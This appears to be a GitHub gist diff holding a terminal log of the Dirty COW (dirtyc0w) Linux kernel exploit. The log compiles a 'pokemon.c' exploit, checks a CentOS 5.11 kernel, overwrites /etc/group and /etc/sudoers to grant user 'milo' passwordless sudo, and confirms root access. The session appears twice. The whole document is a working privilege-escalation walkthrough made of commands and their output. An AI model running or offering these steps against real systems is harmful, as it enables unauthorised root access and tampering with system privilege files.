milo2012 · October 19, 2018 00:50 · milo2012 · Oct 28, 2016
diff --git a/dirtycow (dirtyc0w) b/dirtycow (dirtyc0w)
 $ git clone https://github.com/dirtycow/dirtycow.github.io/
 $ cd dirtycow.github.io
 $ gcc -lpthread pokemon.c -o pokemon

 $ cat /etc/issue
 CentOS release 5.11 (Final)
 Kernel \r on an \m

 $ uname -r
 2.6.18-398.el5

 $ uname -a
 Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:50:52 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux

 $  grep -c ^processor /proc/cpuinfo    
 2

 $ ./pokemon /etc/group "$(sed '/\(root*\)/ s/$/,milo/' /etc/group)"
 $ echo "milo ALL=(ALL) NOPASSWD: ALL ##" > /tmp/out
 $ cat /etc/sudoers
 root    ALL=(ALL)       ALL

 $ ./pokemon /etc/sudoers "$(cat /tmp/out)"                            
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, /milo ALL=(ALL) NOPASSWD: ALL                          
     //    //                              
    ^^    ^^                               
 mmap 2b913021e000
 ptrace 0
 madvise 0

 $ cat /etc/sudoers
 milo ALL=(ALL) NOPASSWD: ALL
 root    ALL=(ALL)       ALL

 $ sudo whoami
 root
	$ git clone https://github.com/dirtycow/dirtycow.github.io/
	$ cd dirtycow.github.io
	$ gcc -lpthread pokemon.c -o pokemon

	$ cat /etc/issue
	CentOS release 5.11 (Final)
	Kernel \r on an \m

	$ uname -r
	2.6.18-398.el5

	$ uname -a
	Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:50:52 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux

	$ grep -c ^processor /proc/cpuinfo
	2

	$ ./pokemon /etc/group "$(sed '/\(root*\)/ s/$/,milo/' /etc/group)"
	$ echo "milo ALL=(ALL) NOPASSWD: ALL ##" > /tmp/out
	$ cat /etc/sudoers
	root ALL=(ALL) ALL

	$ ./pokemon /etc/sudoers "$(cat /tmp/out)"
	(___)
	(o o)_____/
	@@ ` \
	\ ____, /milo ALL=(ALL) NOPASSWD: ALL
	// //
	^^ ^^
	mmap 2b913021e000
	ptrace 0
	madvise 0

	$ cat /etc/sudoers
	milo ALL=(ALL) NOPASSWD: ALL
	root ALL=(ALL) ALL

	$ sudo whoami
	root